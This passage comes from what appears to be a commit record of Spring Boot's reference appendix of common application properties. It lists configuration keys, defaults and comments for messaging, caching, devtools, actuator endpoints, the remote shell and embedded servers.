requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.listener.acknowledge-mode= # acknowledge mode of container\n\tspring.rabbitmq.listener.auto-startup=true # start the container automatically on startup\n\tspring.rabbitmq.listener.concurrency= # minimum number of consumers\n\tspring.rabbitmq.listener.max-concurrency= # maximum number of consumers\n\tspring.rabbitmq.listener.prefetch= # number of messages to be handled in a single request\n\tspring.rabbitmq.listener.transaction-size= # number of messages to be processed in a transaction\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # Artemis host (native mode)\n\tspring.artemis.port=5445 # Artemis port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs artemis-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, 
embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.listener.acknowledge-mode= # session acknowledgment mode\n\tspring.jms.listener.auto-startup=true # start the container automatically on startup\n\tspring.jms.listener.concurrency= # minimum number of concurrent consumers\n\tspring.jms.listener.max-concurrency= # maximum number of concurrent consumers\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK 
({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=false # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, defaults to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n\t# DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n\tspring.devtools.restart.enabled=true # enable automatic restart\n\tspring.devtools.restart.exclude= # patterns that should be excluded from triggering a full restart\n\tspring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n\tspring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n\tspring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n\tspring.devtools.livereload.port=35729 # server port\n\n\t# REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n\tspring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n\tspring.devtools.remote.debug.enabled=true # enable remote debug support\n\tspring.devtools.remote.debug.local-port=8000 # local remote debug server port\n\tspring.devtools.remote.restart.enabled=true # enable remote restart\n\tspring.devtools.remote.secret= # a shared secret required to establish a connection\n\tspring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER 
({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # defaults to '\/'\n\tmanagement.add-application-context-header= # defaults to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creation policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HYPERMEDIA ENDPOINTS\n\tendpoints.docs.enabled=true\n\tendpoints.docs.curies.enabled=false\n\tendpoints.hal.enabled=true\n\tendpoints.links.enabled=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. 
* allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. 
Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. 
^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.name= # config file name (default to 'application')\n\tspring.config.location= # location of config file\n\n\t# PROFILES\n\tspring.profiles.active= # comma list of <<howto-set-active-spring-profiles,active profiles>>\n\tspring.profiles.include= # unconditionally activate the specified comma separated profiles\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources= # sources (class name, package name or XML resource location) to include\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # enable admin features for the application\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (\"detect\", \"always\", \"never\")\n\n\t# LOGGING\n\tlogging.path=\/var\/log\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n\tlogging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\tlogging.pattern.console= # appender pattern for output to the console (only supported with the default logback setup)\n\tlogging.pattern.file= # appender pattern for output to the file (only supported with the default logback setup)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.excluded-user-agents= # list of user-agents to exclude from compression\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. 
server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.persistent=false # true if session should be saved across restarts\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\", \"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30 # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads=0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding=UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n\tserver.undertow.buffers-per-region= # number of buffers per region\n\tserver.undertow.direct-buffers=false # allocate buffers outside the Java heap\n\tserver.undertow.io-threads= # number of I\/O threads to create for the worker\n\t
server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_GB\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the content of the \"default\" model should be ignored during redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. 
CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.locale= # locale used for formatting\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\tspring.jackson.time-zone= # Time zone used when formatting dates. Configured using any recognized time zone identifier, for example \"America\/Los_Angeles\" or \"GMT+10\"\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\tspring.thymeleaf.template-resolver-order= # order of the template resolver in the chain\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES 
